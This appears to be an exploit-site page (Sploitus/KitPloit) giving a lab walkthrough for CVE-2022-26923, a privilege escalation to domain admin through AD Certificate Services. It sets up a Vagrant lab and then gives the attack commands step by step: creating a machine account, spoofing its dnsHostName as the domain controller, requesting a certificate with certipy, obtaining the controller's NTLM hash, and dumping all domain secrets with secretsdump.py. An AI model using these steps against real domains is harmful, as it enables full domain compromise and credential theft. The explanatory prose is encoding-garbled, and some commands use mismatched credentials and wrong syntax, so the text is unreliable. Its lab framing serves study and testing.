## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GH-BADR-CVE-2022-26923
# CVE-2022-26923
## рд╡рд┐рд╡рд░рдг
рдпрд╣ рднреЗрджреНрдпрддрд╛ рдПрдХ рдирд┐рдореНрди-рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ Active Directory Certificate Services (AD CS) рд╕рд░реНрд╡рд░ рднреВрдорд┐рдХрд╛ рд╕реНрдерд╛рдкрд┐рдд рдбрд┐рдлрд╝реЙрд▓реНрдЯ Active Directory рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рддрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред
рдпрд╣ рдореБрдЦреНрдп рд░реВрдк рд╕реЗ Active Directory Certificate Services (AD CS) рднреВрдорд┐рдХрд╛ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╣реИред AD CS рднреВрдорд┐рдХрд╛ рдПрдХ Windows Server рднреВрдорд┐рдХрд╛ рд╣реИ рдЬреЛ рдЖрдкрдХреЛ рдЕрдкрдиреЗ рд╕рдВрдЧрдарди рдХреЗ рд▓рд┐рдП рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдВрдЬреА рдЕрд╡рд╕рдВрд░рдЪрдирд╛ (PKI) рдмрдирд╛рдиреЗ рддрдерд╛ рд╕рд╛рд░реНрд╡рдЬрдирд┐рдХ рдХреБрдВрдЬреА рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлреА, рдбрд┐рдЬрд┐рдЯрд▓ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдФрд░ рдбрд┐рдЬрд┐рдЯрд▓ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдХреНрд╖рдорддрд╛рдПрдБ рдкреНрд░рджрд╛рди рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред AD CS рднреВрдорд┐рдХрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ, рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдФрд░ рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдЬрд╛рд░реА рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
## рд╡рд┐рд╖рдп-рд╕реВрдЪреА
* CVE-2022-26923
* рд╡рд┐рд╡рд░рдг
* рд╡рд┐рд╖рдп-рд╕реВрдЪреА
* рдкреВрд░реНрд╡рд╛рдкреЗрдХреНрд╖рд╛рдПрдБ
* рдкрд░реНрдпрд╛рд╡рд░рдг
* рд╢реЛрд╖рдг
* рдЕрд╡рдзрд╛рд░рдгрд╛ рдХрд╛ рдкреНрд░рдорд╛рдг
* рд╕рдВрджрд░реНрдн
## рдкреВрд░реНрд╡рд╛рдкреЗрдХреНрд╖рд╛рдПрдБ
* Vagrant
* VirtualBox
## рдкрд░реНрдпрд╛рд╡рд░рдг
рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЧрдпрд╛ Windows Server рд╕рдВрд╕реНрдХрд░рдг **Windows Server 2019** Standard Evaluation рд╣реИ, рдЬреЛ рднреЗрджреНрдп рд╕рдВрд╕реНрдХрд░рдг рд╣реИред рдкреНрд░рджрд╛рди рдХреА рдЧрдИ Vagrantfile (Vulnerable Machine рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ) рдПрдХ Windows Server 2019 VM рдмрдирд╛рдПрдЧреА рдЬрд┐рд╕рдореЗрдВ AD CS рднреВрдорд┐рдХрд╛ рд╕реНрдерд╛рдкрд┐рдд рдФрд░ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХреА рдЧрдИ рд╣реИ, рд╕рд╛рде рд╣реА рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рд╡рд╛рд▓рд╛ рдПрдХ рдирд┐рдореНрди-рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рднреА:
* рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо: `user`
* рдкрд╛рд╕рд╡рд░реНрдб: `V@grant1`
рдкрд░реНрдпрд╛рд╡рд░рдг рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдЗрди рдЪрд░рдгреЛрдВ рдХрд╛ рдкрд╛рд▓рди рдХрд░реЗрдВ:
* рдкрд╣рд▓реЗ рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рдХреЛ рдХреНрд▓реЛрди рдХрд░реЗрдВ рдФрд░ `CVE-2022-26923` рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рдЬрд╛рдПрдБ:
root@kitploit:~
git clone https://github.com/Gh-Badr/CVE-2022-26923
cd CVE-2022-26923
* рдпрджрд┐ рдЖрдкрдХреЛ рдбрд┐рдлрд╝реЙрд▓реНрдЯ IP рдкрддрд╛ рдмрджрд▓рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ, рддреЛ рдЖрдк `Vagrantfile` рдореЗрдВ рдирд┐рдореНрди рдкрдВрдХреНрддрд┐ рдореЗрдВ IP рдкрддреЗ рдХреЛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдХреЗ рдРрд╕рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
root@kitploit:~
config.vm.network "private_network", type: "static", ip: "192.168.33.13"
* рдлрд┐рд░ VM рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ:
root@kitploit:~
cd 'Vulnerable Machine'
vagrant up
* рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ `certipy` рд╕реНрдерд╛рдкрд┐рдд рд▓рд┐рдирдХреНрд╕ рдорд╢реАрди рдирд╣реАрдВ рд╣реИ, рддреЛ рдЖрдк рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ `Attacker Machine` рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ рдкреНрд░рджрд╛рди рдХреА рдЧрдИ vagrant рдорд╢реАрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
root@kitploit:~
cd 'Attacker Machine'
vagrant up
`Attacker Machine` рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдПрдХ vagrant рдорд╢реАрди рдХреЗ рд╕рд╛рде рдПрдХ рд╢реЗрд▓ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╢рд╛рдорд┐рд▓ рд╣реИ рдЬреЛ `certipy` рдХрд╛ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдЧреАред рдЖрдк рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдЕрдкрдиреА рд▓рд┐рдирдХреНрд╕ рдорд╢реАрди рдкрд░ `certipy` рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рднреА рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
## рд╢реЛрд╖рдг
рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, `Attacker Machine` рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реЗ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ:
root@kitploit:~
vagrant ssh
рдЕрдм рдЬрдм рдЖрдк рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рдореЗрдВ рд╣реИрдВ, рддреЛ рдЖрдкрдХреЛ Windows Server рдХрд╛ IP рдкрддрд╛ `hosts` рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЬреЛрдбрд╝рдирд╛ рд╣реЛрдЧрд╛:
root@kitploit:~
echo "192.168.33.13 VAGRANT-K51B6U3.vagrant.local VAGRANT-K51B6U3 vagrant-VAGRANT-K51B6U3-CA vagrant.local" | sudo tee -a /etc/hosts
**рдиреЛрдЯ** : рдпрджрд┐ рдЖрдкрдиреЗ рднреЗрджреНрдп рдорд╢реАрди рдХреА `Vagrantfile` рдореЗрдВ IP рдкрддрд╛ рдмрджрд▓рд╛ рд╣реИ, рддреЛ рдЖрдкрдХреЛ рдЗрд╕реЗ рдпрд╣рд╛рдБ рднреА рдмрджрд▓рдирд╛ рд╣реЛрдЧрд╛ред
рдлрд┐рд░, рдбреЛрдореЗрди рдореЗрдВ рдПрдХ рдирдпрд╛ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рдмрдирд╛рддреЗ рд╣реИрдВ:
root@kitploit:~
addcomputer.py 'vagrant.local/user:V@grant1' -method LDAPS -computer-name 'CVEPC' -computer-pass 'P@ssw0rd'
рдпрд╣ рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рдмрди рдЧрдпрд╛ рд╣реИ, `Vulnerable Machine` рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╕реЗ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ `user` рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб `V@grant1` рдХреЗ рд╕рд╛рде рднреЗрджреНрдп рдорд╢реАрди рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░реЗрдВ:
root@kitploit:~
vagrant ssh
рдлрд┐рд░, рдпрд╣ рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рдмрди рдЧрдпрд╛ рд╣реИ, рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ:
root@kitploit:~
Get-ADComputer CVEPC -Properties dnsHostName,servicePrincipalName
рдЗрд╕ рдорд╢реАрди рдЦрд╛рддреЗ рдХрд╛ dnsHostName `CVEPC.vagrant.local` рд╣реИред рд╣рдо рдЗрд╕ dnsHostName рдХреЛ `VAGRANT-K51B6U3.vagrant.local` рдореЗрдВ рдмрджрд▓рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ, рдЬреЛ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рд╣реИред
рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ рдкрд╣рд▓реЗ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддреЗ `CVEPC` рд╕реЗ Service Principal Name (SPN) рд╣рдЯрд╛рдирд╛ рд╣реЛрдЧрд╛:
root@kitploit:~
Set-ADComputer CVEPC -Properties ServicePrincipalName @{}
рдлрд┐рд░ рд╣рдо рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ dnsHostName рдХреЛ `VAGRANT-K51B6U3.vagrant.local` рдореЗрдВ рдмрджрд▓ рд╕рдХрддреЗ рд╣реИрдВ:
root@kitploit:~
Set-ADComputer CVEPC -Properties dnsHostName VAGRANT-K51B6U3.vagrant.local
* рдиреЛрдЯ: рдпрд╣ рд╕рдордЭрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рд╣рдореЗрдВ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддреЗ рдХрд╛ SPN рдХреНрдпреЛрдВ рд╣рдЯрд╛рдирд╛ рдкрдбрд╝рд╛, рдЖрдк рдкреНрд░реЛрдЬреЗрдХреНрдЯ рд░рд┐рдкреЛрд░реНрдЯ (**рдлреНрд░реЗрдВрдЪ рдореЗрдВ**) рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╛ рдЖрдк рд╕рдВрджрд░реНрдн рдЕрдиреБрднрд╛рдЧ рдореЗрдВ рдкрд╣рд▓рд╛ рд▓реЗрдЦ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ CVE рдХреЗ рд▓реЗрдЦрдХ рджреНрд╡рд╛рд░рд╛ рд╡рд┐рд╕реНрддреГрдд рд╡рд┐рд╡рд░рдг рджрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред
рдЕрдм рдЬрдм рд╣рдорд╛рд░реЗ рдкрд╛рд╕ dnsHostName `VAGRANT-K51B6U3.vagrant.local` рд╡рд╛рд▓рд╛ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рд╣реИ, рддреЛ рд╣рдо рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рдкрд░ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ рднреЗрджреНрдп рдорд╢реАрди рд╕реЗ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
root@kitploit:~
certipy req -username 'some-email@example.com' -password 'P@sww0rd' -ca vagrant-VAGRANT-K51B6U3-CA -template Machine -target VAGRANT-K51B6U3.vagrant.local
рдЖрдкрдХреЛ рд╡рд░реНрддрдорд╛рди рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ `vagrant-k51b6u3.pfx` рдирд╛рдордХ рдПрдХ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдорд┐рд▓рдирд╛ рдЪрд╛рд╣рд┐рдПред рдпрд╣ рдЬрд╛рдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдорд╛рдиреНрдп рд╣реИ, рдЖрдк рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдХрд░ `certipy` рдХреЗ `auth` рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:
root@kitploit:~
certipy auth -pfx vagrant-k51b6u3.pfx
рдпрджрд┐ рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдорд╛рдиреНрдп рд╣реИ, рддреЛ рдЖрдкрдХреЛ рдбреЛрдореЗрди рдХрдВрдЯреНрд░реЛрд▓рд░ рдХрд╛ NTLM рд╣реИрд╢ рдорд┐рд▓рдирд╛ рдЪрд╛рд╣рд┐рдПред рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрдИ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рддрд░реАрдХреЛрдВ рд╕реЗ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред
## рдЕрд╡рдзрд╛рд░рдгрд╛ рдХрд╛ рдкреНрд░рдорд╛рдг
рдЕрд╡рдзрд╛рд░рдгрд╛ рдХреЗ рдкреНрд░рдорд╛рдг рдХреЗ рд░реВрдк рдореЗрдВ, рд╣рдо рдбреЛрдореЗрди рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╕рднреА рд░рд╣рд╕реНрдпреЛрдВ рдХреЛ рдкреБрдирдГ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП NTLM рд╣реИрд╢ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдЬреИрд╕рд╛ рдХрд┐ CVE рдХреЗ рд▓реЗрдЦрдХ рдХреЗ рд▓реЗрдЦ рдореЗрдВ рд╕рдордЭрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ)ред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдо impacket рд╕реВрдЯ рд╕реЗ `secretsdump.py` рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (рдЬреЛ `certipy` рдХреЗ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдг рдХреЗ рд╕рд╛рде рд╕реНрдерд╛рдкрд┐рдд рд╣реЛрддрд╛ рд╣реИ)ред
рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдПрдБ:
root@kitploit:~
secretsdump.py 'vagrant.local/some-email@example.com' -hashes :<NTLM hash>
`<NTLM hash>` рдХреЛ рдкрд┐рдЫрд▓реЗ рдЪрд░рдг рд╕реЗ рдкреНрд░рд╛рдкреНрдд NTLM рд╣реИрд╢ рд╕реЗ рдмрджрд▓реЗрдВред
рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк, рдЖрдкрдХреЛ рдбреЛрдореЗрди рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╕рднреА рд░рд╣рд╕реНрдп рдорд┐рд▓ рдЬрд╛рдиреЗ рдЪрд╛рд╣рд┐рдПред
## рд╕рдВрджрд░реНрдн
* Certifried: Active Directory Domain Privilege Escalation (CVE-2022-26923)
* GitHub - LudovicPatho/CVE-2022-26923_AD-Certificate-Services
* Try Hack Me - CVE-2022-26923